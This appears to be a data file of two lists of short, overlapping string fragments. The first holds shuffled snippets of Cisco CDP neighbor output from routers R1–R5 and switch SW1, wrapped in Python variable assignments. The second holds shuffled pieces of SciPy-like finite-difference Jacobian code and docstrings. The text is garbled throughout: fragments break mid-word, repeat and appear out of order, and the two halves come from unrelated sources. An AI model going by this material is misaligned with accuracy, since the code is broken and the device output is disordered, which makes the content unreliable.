r4_show_cdp_neighbors = ''' R4>show", "R2>show cdp neighbors Capability Codes: R - Router, T -", "Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime:", "OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: ''", "Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail", "1 R3 Fas 0/13 129 R S I 881 Fas", "''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail ------------------------- Device", "I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp", "Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1", "SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco", "= ''' R2>show cdp neighbors detail ------------------------- Device ID: SW1", "R S I 881 Fas 1 R4 Fas 0/14 173", "Duplex: full Management address(es): -------------------------- Device ID: R5 Entry address(es):", "full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors", "ID: R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881,", "- Host, I - IGMP, r - Repeater Device ID", "IGMP, r - Repeater Device ID Local Intrfce Holdtme Capability", "(fc1) Copyright (c) 1986-2006 by cisco Systems, Inc. Compiled Fri", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port", "FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing", "= ''' R5>show cdp neighbors Capability Codes: R - Router,", "1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02 by", "(outgoing port): FastEthernet1 Holdtime: 173 sec Version : Cisco IOS", "VTP Management Domain: '' Native VLAN: 1 Duplex: full '''", "FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec", "= ''' R3>show cdp neighbors Capability Codes: R - Router,", "Duplex: full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp", "Fas 1 R5 Fas 0/15 144 R S I 881", "R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = '''", "Intrfce Holdtme Capability Platform Port ID R1 Fas 0/11 153", "I 881 Fas 1 R3 Fas 0/13 129 R S", "------------------------- Device ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform:", "''' R1>show cdp neighbors Capability Codes: R - Router, T", "#!/usr/bin/env python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes:", "Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability", "R4>show cdp neighbors Capability Codes: R - Router, T -", "full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes:", "Device ID Local Intrfce Holdtme Capability Platform Port ID R1", "Duplex: full Management address(es): -------------------------- Device ID: R4 Entry address(es):", "S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show", "10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12,", "full Management address(es): -------------------------- Device ID: R2 Entry address(es): IP", "IGMP Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123", "S I 881 Fas 1 R5 Fas 0/15 144 R", "123 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "neighbors detail -------------------------- Device ID: R1 Entry address(es): IP address:", "Domain: '' Native VLAN: 1 Duplex: full Management address(es): '''", "Device ID: R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco", "150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = '''", "Port ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec Version", "Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE", "Holdtme Capability Platform Port ID R1 Fas 0/11 153 R", "WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing", "-------------------------- Device ID: R3 Entry address(es): IP address: 10.1.1.3 Platform:", "R4>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "SW1 Fas 1 150 S I WS-C2950- Fas 0/13 '''", "IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability", "144 R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail =", "Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version :", "address(es): -------------------------- Device ID: R5 Entry address(es): IP address: 10.1.1.5", "ID: R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881,", "Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1", "R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities:", "Domain: '' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors =", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime : 145", "FastEthernet0/13 Holdtime : 145 sec Version : Cisco Internetwork Operating", "Device ID: R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco", "= ''' R4>show cdp neighbors Capability Codes: R - Router,", "FastEthernet1 Holdtime: 173 sec Version : Cisco IOS Software, C880", "IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)", "Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime :", "advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27,", "'' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = '''", "Bridge, B - Source Route Bridge S - Switch, H", "by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by weiliu", "len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1 Duplex:", "I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp", "Fas 1 150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail", "1 Duplex: full Management address(es): -------------------------- Device ID: R3 Entry", "I 881 Fas 1 R4 Fas 0/14 173 R S", "cdp neighbors detail -------------------------- Device ID: R1 Entry address(es): IP", "sec Version : Cisco Internetwork Operating System Software IOS (tm)", "Local Intrfce Holdtme Capability Platform Port ID R1 Fas 0/11", "- IGMP, r - Repeater Device ID Local Intrfce Holdtme", "Holdtme Capability Platform Port ID SW1 Fas 1 150 S", "R S I 881 Fas 1 R3 Fas 0/13 129", "1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors", ": 145 sec Version : Cisco Internetwork Operating System Software", "''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail ------------------------- Device", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R4", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/11", "Fas 1 150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail", "Fas 0/15 144 R S I 881 Fas 1 '''", "10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11,", "weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload", "IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port):", "'' Native VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors", "150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = '''", "FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec", "150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = '''", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing", "''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes: R", "(outgoing port): FastEthernet1 Holdtime: 153 sec Version : Cisco IOS", "144 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "Platform Port ID R1 Fas 0/11 153 R S I", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port", "0/14 173 R S I 881 Fas 1 R5 Fas", "ID: R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881,", "S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show", "port): FastEthernet0/12 Holdtime : 145 sec Version : Cisco Internetwork", "(outgoing port): FastEthernet0/11 Holdtime : 145 sec Version : Cisco", "Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability", "SW1 Fas 1 150 S I WS-C2950- Fas 0/12 '''", "(outgoing port): FastEthernet0/13 Holdtime : 145 sec Version : Cisco", "VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors = '''", "FastEthernet1 Holdtime: 123 sec Version : Cisco IOS Software, C880", "address(es): -------------------------- Device ID: R3 Entry address(es): IP address: 10.1.1.3", "Fas 1 R2 Fas 0/12 123 R S I 881", "'' Native VLAN: 1 Duplex: full Management address(es): -------------------------- Device", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime : 145", "address(es): -------------------------- Device ID: R2 Entry address(es): IP address: 10.1.1.2", "Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime:", "IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153", "''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail ------------------------- Device", "IGMP Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129", "= ''' R1>show cdp neighbors Capability Codes: R - Router,", "1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors", "ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec Version :", "address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1,", "port): FastEthernet0/14 Holdtime : 145 sec Version : Cisco Internetwork", "address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "(c) 1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02", "Repeater, P - Phone Device ID Local Intrfce Holdtme Capability", "Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c)", "I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp", "full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes:", "Port ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec Version", "T - Trans Bridge, B - Source Route Bridge S", "Management address(es): -------------------------- Device ID: R2 Entry address(es): IP address:", "I 881 Fas 1 R5 Fas 0/15 144 R S", "IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version :", "= ''' R1>show cdp neighbors detail ------------------------- Device ID: SW1", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R2", "0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail -------------------------", "address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show", "'' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = '''", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/14", "Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail", "0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail -------------------------", "Capability Codes: R - Router, T - Trans Bridge, B", "Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement", "- Router, T - Trans Bridge, B - Source Route", "1 R2 Fas 0/12 123 R S I 881 Fas", "Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1", "S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show", "Host, I - IGMP, r - Repeater Device ID Local", "Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1", "1 150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail =", "cdp neighbors Capability Codes: R - Router, T - Trans", "address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch", "address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID", "Duplex: full Management address(es): -------------------------- Device ID: R2 Entry address(es):", "Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1", "R1>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "Port ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec Version", "full Management address(es): -------------------------- Device ID: R3 Entry address(es): IP", "full Management address(es): -------------------------- Device ID: R5 Entry address(es): IP", "''' SW1>show cdp neighbors Capability Codes: R - Router, T", "1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail", "- Switch, H - Host, I - IGMP, r -", "version: 2 VTP Management Domain: '' Native VLAN: 1 Duplex:", "''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes: R", "Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability", "Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability", "= ''' R2>show cdp neighbors Capability Codes: R - Router,", "r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail ------------------------- Device ID:", "ID R1 Fas 0/11 153 R S I 881 Fas", "Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version :", "Holdtime: 173 sec Version : Cisco IOS Software, C880 Software", "neighbors detail ------------------------- Device ID: SW1 Entry address(es): IP address:", "150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = '''", "Fri 28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol Hello:", "FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version", "I - IGMP, r - Repeater Device ID Local Intrfce", "Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco", "Management address(es): -------------------------- Device ID: R5 Entry address(es): IP address:", "Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch", "Inc. Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version: 2", "1 150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail =", "ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec Version :", "1 Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors", "0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail -------------------------", "'' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = '''", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R3", "0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail -------------------------", "r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail ------------------------- Device ID:", "address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors", "Fas 0/13 129 R S I 881 Fas 1 R4", "Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show", "address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes:", "port): FastEthernet1 Holdtime: 173 sec Version : Cisco IOS Software,", "Host, I - IGMP, r - Repeater, P - Phone", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing", "WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors", "SW1 Fas 1 150 S I WS-C2950- Fas 0/15 '''", "SW1> show cdp neighbors detail -------------------------- Device ID: R1 Entry", "Trans Bridge, B - Source Route Bridge S - Switch,", "I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp", "RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by", "r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes: R -" ]
[ "return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0,", "np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim > 1: raise RuntimeError(\"`fun` return", "row_indices = [] col_indices = [] fractions = [] n_groups", "'2-point': x = x0 + h_vec dx = x -", "shape. x0 : array_like of shape (n,) or float Point", "df / dx elif method == '3-point': def matvec(p): if", "greedy sequential algorithm is used to construct groups. Parameters ----------", "which we wish to estimate derivative. h : ndarray, shape", "are required. In other words '1-sided' applies to forward and", "raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if np.all((lb ==", "x2[mask_2] - x1[mask_2] f1 = fun(x1) f2 = fun(x2) cols,", "= x0 - (dx/2)*p x2 = x0 + (dx/2)*p f1", "sparse finite differencing [1]_. Two columns are in the same", "it is assumed to be equal to ``fun(x0)``, in this", "must have at most 1 dimension.\") lb, ub = _prepare_bounds(bounds,", "c1, c2): ... return np.array([x[0] * np.sin(c1 * x[1]), ...", "shape (n,), on the other hand when n=1 Jacobian is", "shape (n,). See Also -------- check_derivative : Check correctness of", "upper_dist[forward] / num_steps) use_one_sided[forward] = True backward = (upper_dist <", "Jacobian. i, j, _ = find(structure[:, cols]) # Restore column", "for all variables. Use it to limit the range of", "a dense array or a sparse matrix depending on `sparsity`.", "and round-off errors, see [1]_. A finite difference scheme for", "dtype=bool) else: raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if", "is interpreted as (structure, groups). If None (default), a standard", "ValueError(\"Bounds not supported when \" \"`as_linear_operator` is True.\") def fun_wrapped(x):", "method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute", "and <NAME>, \"On the estimation of sparse Jacobian matrices\", Journal", "ndarray, shape (n,) Lower bounds on independent variables. ub :", "Matrix of which to group columns. order : int, iterable", "variables. Defaults to no bounds. Each bound must match the", "is not called. Default is None. bounds : tuple of", "(1974), pp. 117-120. .. [3] <NAME>, \"Generation of Finite Difference", "def f(x, c1, c2): ... return np.array([x[0] * np.sin(c1 *", "= x0 - h_vecs[i] x2 = x0 + h_vecs[i] dx", "incorrect shape.\") A = A[:, order] if issparse(A): groups =", "column grouping for a given sparsity structure, use `group_columns` to", "order of columns enumeration. If int or None, a random", "row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices) col_indices =", "possibly adjusted to fit into the bounds. For ``method='3-point'`` the", "-1 forward = (upper_dist >= lower_dist) & ~fitting h_adjusted[forward] =", "center schemes. lb : ndarray, shape (n,) Lower bounds on", "form m-by-n matrix called the Jacobian, where an element (i,", "derivatives form m-by-n matrix called the Jacobian, where an element", ">>> approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]])", "x0): lb, ub = [np.asarray(b, dtype=float) for b in bounds]", "h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1] mask_2 = ~use_one_sided &", "x2 = x0 + (dx/2)*p f1 = fun(x1) f2 =", "method == 'cs': f1 = fun(x0 + h_vecs[i]*1.j) df =", "& (ub == np.inf)): return h, use_one_sided h_total = h", "shape (n,) or float Point at which to estimate the", "In all cases np.atleast_2d can be called to get 2-D", "J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return csr_matrix(J) def", "else: raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if np.all((lb", "returned with a shape (m, 1). Our motivation is the", "... >>> def jac(x, c1, c2): ... return np.array([ ...", "= cols[j] mask = use_one_sided[j] df = np.empty(m) rows =", "bounds. For ``method='3-point'`` the sign of `h` is ignored. If", "a shape (m, 1). Our motivation is the following: a)", "use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb, ub) elif", "used for points near the boundary. Both schemes have the", "* groups : array_like of shape (n,). A column grouping", "implementation is correct. See Also -------- approx_derivative : Compute finite", "x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]]) Bounds can", "structure, for ndarrays, if m=1 it is returned as a", "2*h / norm(p) x1 = x0 - (dx/2)*p x2 =", "enumeration. If int or None, a random permutation is used", "f0, rel_step, method) else: h = _compute_absolute_step(rel_step, x0, method) if", "x0) if lb.shape != x0.shape or ub.shape != x0.shape: raise", "to group columns. order : int, iterable of int with", "Otherwise it returns a dense array or sparse matrix depending", "numpy as np >>> from scipy.optimize import check_derivative >>> >>>", "in each row, then it's possible to estimate its several", "ub = _prepare_bounds(bounds, x0) if lb.shape != x0.shape or ub.shape", "is to compute the fraction. We store i, j and", "approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]]) Bounds", "checking is not implemented when `as_linear_operator` is True. sparsity :", "the range of function evaluation. Bounds checking is not implemented", "array or sparse matrix depending on how `sparsity` is defined.", "elif method == '3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return", "h_vecs[i] dx = x2[i] - x1[i] f1 = fun(x1) f2", "sparse matrix of shape (m, n). A zero element means", "\"\"\"Routines for numerical differentiation.\"\"\" from __future__ import division import numpy", "check_derivative : Check correctness of a function computing derivatives. Notes", "ValueError(\"`order` has incorrect shape.\") A = A[:, order] if issparse(A):", "matrix called the Jacobian, where an element (i, j) is", "x0 + h_total violated = (x < lb) | (x", "limit the range of function evaluation. Bounds checking is not", "called to get 2-D Jacobian with correct dimensions. References ----------", "Notes. f0 : None or array_like, optional If not None", "or sparse matrix, shape (m, n) Matrix of which to", "x[1])], ... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2", "13 (1974), pp. 117-120. \"\"\" if issparse(A): A = csc_matrix(A)", "> 1: raise RuntimeError(\"`fun` return value has \" \"more than", "np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *= -1 forward", "array_like of shape (m,) or a scalar. jac : callable", "import numpy as np from numpy.linalg import norm from scipy.sparse.linalg", "and `x0`.\") if as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise", "machine epsilon for float64 numbers, s=2 for '2-point' method and", "helpful only if n_groups is significantly less than n. References", "= -3.0 * f0 + 4 * f1 - f2", "h) scheme : {'1-sided', '2-sided'} Whether steps in one or", "is None then a ndarray with shape (m, n) is", "dtype=float) for b in bounds] if lb.ndim == 0: lb", "- f0 elif method == '3-point' and use_one_sided[i]: x1 =", "schemes have the second-order accuracy in terms of Taylor expansion.", "_compute_absolute_step(rel_step, x0, method): if rel_step is None: rel_step = relative_step[method]", "df[rows] = f2[rows] - f1[rows] elif method == 'cs': f1", "which ith column assigned. The procedure was helpful only if", "_adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub) elif method ==", "= np.resize(ub, x0.shape) return lb, ub def group_columns(A, order=0): \"\"\"Group", "col_indices)), shape=(m, n)) return csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf,", "A.indices, A.indptr) else: groups = group_dense(m, n, A) groups[order] =", "which to group columns. order : int, iterable of int", "procedure was helpful only if n_groups is significantly less than", "return h, use_one_sided h_total = h * num_steps h_adjusted =", "= x2[i] - x1[i] f1 = fun(x1) f2 = fun(x2)", "j, abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data)", "... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 *", "the boundary. - 'cs' - use a complex-step finite difference", "a scalar, in the latter case the bound will be", "is returned with a shape (m, 1). Our motivation is", "for b in bounds] if lb.ndim == 0: lb =", "0: lb = np.resize(lb, x0.shape) if ub.ndim == 0: ub", "f0 + 4 * f1 - f2 elif method ==", "# Restore column indices in the full array. j =", "arrays and later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j])", "np.inf)) array([ 2.]) \"\"\" if method not in ['2-point', '3-point',", "= relative_step[method] sign_x0 = (x0 >= 0).astype(float) * 2 -", "`sparsity` is defined. If `sparsity` is None then a ndarray", "both directions are required. In other words '1-sided' applies to", "forward or backward scheme is used for points near the", "-lower_dist[backward] / num_steps elif scheme == '2-sided': central = (lower_dist", "shape (m, 1). Our motivation is the following: a) It", "fun(x1) f2 = fun(x2) df = -3.0 * f0 +", "h, 1, '2-sided', lb, ub) elif method == 'cs': use_one_sided", "== '2-point': x = x0 + h_vecs[i] dx = x[i]", "bound constraints.\") if as_linear_operator: if rel_step is None: rel_step =", "= x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2] f1", "gradient computation (m=1) in a conventional way. b) It clearly", "rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else:", "match the size of `x0` or be a scalar, in", "scheme == '1-sided': x = x0 + h_total violated =", "sparsity structure, use `group_columns` to obtain it. A single array", "= fun(x2) df = -3.0 * f0 + 4 *", "we compute left and right derivative at point 1.0. >>>", ": ndarray, shape (n,) Point at which we wish to", "Spaced Grids\", Mathematics of Computation 51, 1988. Examples -------- >>>", "= _compute_absolute_step(rel_step, x0, method) if method == '2-point': h, use_one_sided", "or both directions are required. In other words '1-sided' applies", "of Mathematics and its Applications, 13 (1974), pp. 117-120. \"\"\"", "% method) x0 = np.atleast_1d(x0) if x0.ndim > 1: raise", "x0.shape) return lb, ub def group_columns(A, order=0): \"\"\"Group columns of", "of shape (m,) or a scalar. x0 : array_like of", "n_groups is the number of found groups. Each value ``groups[i]``", "'3-point' method. Such relative step approximately minimizes a sum of", "+ h_vecs[i] dx = x2[i] - x1[i] f1 = fun(x1)", "Parameters ---------- A : array_like or sparse matrix, shape (m,", "f0 : None or array_like, optional If not None it", "a scalar. jac : callable Function which computes Jacobian matrix", "n) is returned. If `sparsity` is not None returns a", "with shape (m, n). Otherwise it returns a dense array", "does not allow direct access to individual elements of the", "of f[i] with respect to x[j]. Parameters ---------- fun :", "approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs) abs_err = np.abs(J_to_test - J_diff)", "be a scalar, in the latter case the bound will", "* np.sin(c1 * x[1]), ... x[0] * np.cos(c2 * x[1])])", "`x0` or be a scalar, in the latter case the", "def _dense_difference(fun, x0, f0, h, use_one_sided, method): m = f0.size", "Refer to [2]_ for the formulas of 3-point forward and", "wish to estimate derivative. h : ndarray, shape (n,) Desired", "but guarantee repeatability. Returns ------- groups : ndarray of int,", "n_groups is significantly less than n. References ---------- .. [1]", "to [2]_ for the formulas of 3-point forward and backward", "J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test =", "n)) return csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(),", "abs_err = J_to_test - J_diff i, j, abs_err_data = find(abs_err)", "f2 - f1 elif method == 'cs': f1 = fun(x0", "x0 + h_vecs[i] dx = x[i] - x0[i] # Recompute", "same for all variables. Use it to limit the range", "variables. Returns ------- h_adjusted : ndarray, shape (n,) Adjusted step", "use_one_sided = False if sparsity is None: return _dense_difference(fun_wrapped, x0,", "(n,) or None Permutation array which defines the order of", "with respect to x[j]. Parameters ---------- fun : callable Function", "the presence of bounds. Parameters ---------- x0 : ndarray, shape", "else: groups = group_dense(m, n, A) groups[order] = groups.copy() return", "it to limit the range of function evaluation. args, kwargs", "EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0, method): if rel_step is", "1-D array. bounds : 2-tuple of array_like, optional Lower and", "dx = h / norm(p) x = x0 + dx*p", "function computing derivatives. Notes ----- If `rel_step` is not provided,", "(upper_dist >= lower_dist) & ~fitting h_adjusted[forward] = upper_dist[forward] / num_steps", "if as_linear_operator: if rel_step is None: rel_step = relative_step[method] return", "For ``method='3-point'`` the sign of `h` is ignored. If None", "which defines the order of columns enumeration. If int or", "always returned as a 2-D structure, for ndarrays, if m=1", "lb) | (x > ub) fitting = np.abs(h_total) <= np.maximum(lower_dist,", "df = f1.imag return df / dx else: raise RuntimeError(\"Never", "x[1]), ... x[0] * np.cos(c2 * x[1])]) ... >>> x0", "index of a group to which ith column assigned. The", "step size to use. The absolute step size is computed", "derivative. h : ndarray, shape (n,) Desired finite difference steps.", "array_like or sparse matrix, shape (m, n) Matrix of which", "for ndarrays, if m=1 it is returned as a 1-D", "method == 'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m)", "absolute step size is computed as ``h = rel_step *", "each row, then it's possible to estimate its several columns", "in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method '%s'. \" %", "a 2-D structure, for ndarrays, if m=1 it is returned", "of the derivatives of a vector-valued function. If a function", "group_columns(sparsity) if issparse(structure): structure = csc_matrix(structure) else: structure = np.atleast_2d(structure)", "LinearOperator((m, n), matvec) def _dense_difference(fun, x0, f0, h, use_one_sided, method):", "j, _ = find(structure[:, cols]) # Restore column indices in", "to the presence of bounds. Parameters ---------- x0 : ndarray,", "False return h_adjusted, use_one_sided relative_step = {\"2-point\": 